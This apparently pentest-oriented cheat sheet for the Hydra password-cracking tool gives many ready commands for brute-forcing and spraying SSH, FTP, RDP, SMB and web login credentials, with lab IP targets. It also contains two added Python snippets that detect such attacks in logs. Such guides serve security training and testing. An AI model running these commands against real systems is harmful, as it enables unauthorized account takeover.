# Hydra User Guide

* <https://github.com/vanhauser-thc/thc-hydra>

> **Note:** For HTTP form brute force, prefer **ffuf** over hydra — it is faster and more flexible. See the [ffuf guide](/tool-guides/ffuf.md#http-brute-force-login-forms).

## Username Generation with username-anarchy

When you know a person's name but not their username format, generate variations:

```bash
./username-anarchy firstname lastname > /tmp/usernames.txt

# Example:
./username-anarchy betty jayde > /tmp/usernames.txt
# Generates: betty, bettyjayde, betty.jayde, bettyjay, bettyj, b.jayde, bjayde, jbetty, j.betty, jaydeb, jayde, bj, etc.
```

Then brute force with the generated list:

```bash
hydra -t 4 -L /tmp/usernames.txt -p 'Texas123!@#' ssh://10.129.7.222 -F -vV
```

## Installation

```bash
sudo apt-get -y install hydra
```

***

## Basic Syntax

```bash
hydra [login_options] [password_options] [attack_options] [service_options]
```

***

## Options Table

| Option               | Description                           | Example                      |
| -------------------- | ------------------------------------- | ---------------------------- |
| `-l LOGIN`           | Single username                       | `hydra -l admin ...`         |
| `-L FILE`            | Username list file                    | `hydra -L users.txt ...`     |
| `-p PASS`            | Single password                       | `hydra -p password123 ...`   |
| `-P FILE`            | Password list file                    | `hydra -P passwords.txt ...` |
| `-t TASKS`           | Parallel tasks (threads)              | `hydra -t 4 ...`             |
| `-f`                 | Stop after first valid login          | `hydra -f ...`               |
| `-F`                 | Stop after first valid login (global) | `hydra -F ...`               |
| `-s PORT`            | Non-default port                      | `hydra -s 2222 ...`          |
| `-v` / `-V`          | Verbose / Very verbose                | `hydra -V ...`               |
| `-M FILE`            | List of target servers                | `hydra -M targets.txt ...`   |
| `-x MIN:MAX:CHARSET` | Generate passwords                    | `hydra -x 6:8:a1 ...`        |

***

## Services Table

| Service           | Protocol               | Example                                                 |
| ----------------- | ---------------------- | ------------------------------------------------------- |
| `ssh`             | SSH                    | `hydra -l root -P pass.txt ssh://192.168.1.100`         |
| `ftp`             | FTP                    | `hydra -l admin -P pass.txt ftp://192.168.1.100`        |
| `http-get`        | HTTP Basic Auth        | `hydra -L users.txt -P pass.txt example.com http-get /` |
| `http-post-form`  | Web Login Form (HTTP)  | See below                                               |
| `https-post-form` | Web Login Form (HTTPS) | Same syntax as http-post-form, use for HTTPS            |
| `rdp`             | Remote Desktop         | `hydra -l admin -P pass.txt rdp://192.168.1.100`        |
| `smb`             | SMB                    | `hydra -l admin -P pass.txt 192.168.1.100 smb`          |
| `mysql`           | MySQL                  | `hydra -l root -P pass.txt mysql://192.168.1.100`       |
| `mssql`           | MS SQL Server          | `hydra -l sa -P pass.txt mssql://192.168.1.100`         |
| `vnc`             | VNC                    | `hydra -P pass.txt vnc://192.168.1.100`                 |
| `pop3`            | POP3 Mail              | `hydra -l user -P pass.txt pop3://mail.server.com`      |
| `imap`            | IMAP Mail              | `hydra -l user -P pass.txt imap://mail.server.com`      |
| `smtp`            | SMTP Mail              | `hydra -l user -P pass.txt smtp://mail.server.com`      |
| `telnet`          | Telnet                 | `hydra -L users.txt -P pass.txt telnet://192.168.1.100` |
| `ldap2`           | LDAP                   | `hydra -L users.txt -P pass.txt 192.168.1.100 ldap2`    |
| `snmp`            | SNMP                   | `hydra -P pass.txt 192.168.1.100 snmp`                  |

***

## Hydra Syntax

* The correct hydra syntax depends on the service you are going after. For example, if we want to hit FTP we should use:

## FTP

```
hydra -l user -P passlist.txt ftp://10.10.10.10 -F
```

## Telnet

```bash
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 3 telnet://TARGET -F -vV
```

Telnet can be unreliable for Hydra to analyze. Manually validate any hit with `telnet TARGET 23` before trusting the result.

## SSH

```
hydra -l <username> -P /usr/share/wordlists/rockyou.txt 10.10.10.10 -t 4 ssh
```

* `-l` is to specify the username
* `-P` is to specify a password list
* `-t` is to specify the number of threads to run hydra with.
* Note: Hydra recommends no more than 4 threads, however you can run it faster with `-t 16`.
* `-F` means stop when you find your first valid password, highly recommend this option

```
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://$host -f
hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://$host -f -s 2222
hydra -L user.txt -P password.txt -f ssh://10.10.15.2:31294 -t 4 -w 15 -F 
```
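What the two run shapes above look like from the target's side, as an added detection example (not part of the original guide): a username list with one password (`-L` with `-p`) shows up as one failure per account across many accounts, while one account with a wordlist (`-l` with `-P`) shows up as many failures on a single account. The log lines are constructed, and the function name and `min_failures` threshold are assumptions of this example; a production rule would also bound the time window.

```python
import re
from collections import defaultdict

# Constructed sshd log lines (documentation IP ranges, not from a real host).
SAMPLE_LOG = """\
Mar  3 10:00:01 web1 sshd[2101]: Failed password for invalid user betty from 203.0.113.7 port 40112 ssh2
Mar  3 10:00:02 web1 sshd[2102]: Failed password for invalid user bettyjayde from 203.0.113.7 port 40114 ssh2
Mar  3 10:00:03 web1 sshd[2103]: Failed password for invalid user betty.jayde from 203.0.113.7 port 40116 ssh2
Mar  3 10:00:04 web1 sshd[2104]: Failed password for invalid user bettyj from 203.0.113.7 port 40118 ssh2
Mar  3 10:00:05 web1 sshd[2105]: Accepted password for bjayde from 203.0.113.7 port 40120 ssh2
Mar  3 10:02:10 web1 sshd[2110]: Failed password for root from 198.51.100.9 port 51000 ssh2
Mar  3 10:02:11 web1 sshd[2111]: Failed password for root from 198.51.100.9 port 51002 ssh2
Mar  3 10:02:12 web1 sshd[2112]: Failed password for root from 198.51.100.9 port 51004 ssh2
Mar  3 10:02:13 web1 sshd[2113]: Failed password for root from 198.51.100.9 port 51006 ssh2
Mar  3 10:05:00 web1 sshd[2120]: Failed password for alice from 192.0.2.44 port 60200 ssh2
Mar  3 10:05:09 web1 sshd[2121]: Accepted password for alice from 192.0.2.44 port 60202 ssh2
"""

EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def classify_sources(log_text, min_failures=4):
    """Return {source_ip: (pattern, account_logged_in_after_burst_or_None)}."""
    failures = defaultdict(lambda: defaultdict(int))  # src -> user -> failed attempts
    logged_in = {}
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if not m:
            continue
        src, user = m["src"], m["user"]
        if m["result"] == "Failed":
            failures[src][user] += 1
        elif sum(failures[src].values()) >= min_failures:
            # A success right after a failure burst is the point where -f/-F stops the run.
            logged_in[src] = user
    verdicts = {}
    for src, users in failures.items():
        total = sum(users.values())
        if total < min_failures:
            continue  # a single mistyped password is not an attack
        # Many accounts, about one try each: spray. Few accounts, many tries: brute force.
        pattern = "password-spray" if len(users) * 2 >= total else "brute-force"
        verdicts[src] = (pattern, logged_in.get(src))
    return verdicts
```

A source that appears with a non-`None` account is the priority: it means a guessed credential worked and that account's password should be rotated.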

## POST Web Form

* Hydra can be used to brute force web logins as well.
* Step 1: Determine the request made to the form (POST/GET)
* Identify this in the network tab (developer tools), view the source code, or use Burp Suite.

### Syntax

```
hydra [options] target http-post-form "path:params:condition_string"
```

### Success vs Failure Conditions

| Condition  | Description                                     | Example                 |
| ---------- | ----------------------------------------------- | ----------------------- |
| `F=string` | **Failure** - Text in response when login fails | `F=Invalid credentials` |
| `S=string` | **Success** - Text in response when login works | `S=Dashboard`           |
| `S=302`    | **Success** - HTTP redirect on successful login | `S=302`                 |

**Use `F=` when you know the failure message (most common):**

```bash
hydra -l admin -P pass.txt example.com http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid credentials"
# HTTPS form (e.g. phpLiteAdmin), limit threads for stability
hydra -l admin -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt TARGET_IP https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -t 3
```

**Use `S=` when you know what success looks like:**

```bash
hydra -l admin -P pass.txt example.com http-post-form "/login:user=^USER^&pass=^PASS^:S=302"
hydra -l admin -P pass.txt example.com http-post-form "/login:user=^USER^&pass=^PASS^:S=Welcome"
```
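The same failure/success distinction is visible in the web server's access log, shown here as an added detection example (not part of the original guide): the response hydra would match with `F=` is the dominant response shape for a source, and anything that differs from it (for instance the redirect matched by `S=302`) is a candidate successful guess. The log lines are constructed; the function name, the `/login` path and the `min_posts` threshold are assumptions, and the `Hydra` User-Agent check assumes the client did not override hydra's default header.

```python
import re
from collections import Counter, defaultdict

# Constructed combined-format access log lines (documentation IP ranges).
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [03/Mar/2025:10:05:01 +0000] "POST /login HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (Hydra)"
203.0.113.7 - - [03/Mar/2025:10:05:01 +0000] "POST /login HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (Hydra)"
203.0.113.7 - - [03/Mar/2025:10:05:02 +0000] "POST /login HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (Hydra)"
203.0.113.7 - - [03/Mar/2025:10:05:02 +0000] "POST /login HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (Hydra)"
203.0.113.7 - - [03/Mar/2025:10:05:03 +0000] "POST /login HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (Hydra)"
203.0.113.7 - - [03/Mar/2025:10:05:03 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Hydra)"
192.0.2.44 - - [03/Mar/2025:10:07:10 +0000] "POST /login HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/124.0"
192.0.2.44 - - [03/Mar/2025:10:07:19 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/124.0"
"""

LINE = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[[^\]]+\] "POST (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "[^"]*" "(?P<ua>[^"]*)"'
)

def find_form_bruteforce(log_text, login_path="/login", min_posts=5):
    """Return {source_ip: finding} for sources hammering the login form."""
    posts = defaultdict(list)  # src -> [(status, size, user_agent), ...]
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m and m["path"].split("?")[0] == login_path:
            posts[m["src"]].append((m["status"], m["size"], m["ua"]))
    findings = {}
    for src, reqs in posts.items():
        if len(reqs) < min_posts:
            continue  # normal users retry a login once or twice
        shapes = Counter((status, size) for status, size, _ in reqs)
        failure_shape = shapes.most_common(1)[0][0]  # the page an F= string would match
        findings[src] = {
            "posts": len(reqs),
            "hydra_user_agent": any("Hydra" in ua for _, _, ua in reqs),
            # Responses unlike the failure page, e.g. the 302 that S=302 matches.
            "possible_success": [s for s in shapes if s != failure_shape],
        }
    return findings
```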

### Full Example

```
hydra -l <username> -P /usr/share/wordlists/rockyou.txt 10.10.211.150 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -vV
```

* `http-post-form` specifies the type of form
* `/` (the first field) is the path of the login page, e.g. `/login.php` for `http://dont-brute-force-me.com/login.php`
* `username` is the form field name for the username
* `^USER^` tells hydra to insert the username you specified
* `password` is the form field name for the password
* `^PASS^` is replaced with each entry from the password list specified in the command
* `F=incorrect` is the word that appears on the page if the login fails
* `-vV` specifies very verbose output

Hydra against a non-default SSH port:

```
hydra -t 16 -l sam -P /usr/share/wordlists/rockyou.txt 10.10.80.187 ssh -s 4567 -vV
```

### HTTP-GET

* Basic Authentication HTTP-GET

```
hydra -vV -l administrator -P 2023-200_most_used_passwords.txt 10.13.38.11 http-get /admin/ 
hydra -vV -t 2 -l administrator -P /usr/share/seclists/Passwords/seasons.txt 10.13.38.11 http-get /admin/
```

## Example Syntax

```
# Hydra brute force against SNMP
hydra -P password-file.txt -v $ip snmp
# Hydra FTP known user and rockyou password list
hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp
# Hydra SSH using list of users and passwords
hydra -v -V -u -L users.txt -P passwords.txt -t 1 $ip ssh
# Hydra SSH using a known password and a username list
hydra -v -V -u -L users.txt -p "" -t 1 $ip ssh
# Hydra SSH against known username on port 22
hydra $ip -s 22 ssh -l <username> -P big_wordlist.txt
# Hydra POP3 brute force
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f $ip pop3 -V
# Hydra SMTP brute force
hydra -P /usr/share/wordlists/nmap.lst $ip smtp -V
# Hydra attack http get 401 login with a dictionary
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
# Hydra attack Windows Remote Desktop with rockyou
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
# Hydra brute force SMB user with rockyou
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb
# Hydra brute force a Wordpress admin login
hydra -l admin -P ./passwordlist.txt $ip -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
# SMB brute forcing
hydra -L usernames.txt -P passwords.txt $ip smb -V -f
# LDAP brute forcing
hydra -L users.txt -P passwords.txt $ip ldap2 -V -f
```

## Additional Syntax Formats

```
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"
sudo hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.211.150 http-post-form "/login:username=molly&password=^PASS^:F=incorrect" -V
sudo hydra 10.0.0.1 http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin
hydra -l lazie -P /opt/rockyou.txt imap://10.10.251.142 -vV
```

***

### Credential Stuffing

* Use `-C` with a colon-separated `user:pass` file instead of separate user and password lists

```
hydra -C user_pass.list ssh://10.100.38.23
```

### Password Spraying (SMB via NetExec)

```
netexec smb 10.100.38.0/24 -u usernames.list -p 'ChangeMe123!'
```

### Default Credentials Cheat Sheet

```
pip3 install defaultcreds-cheat-sheet
creds search linksys
```

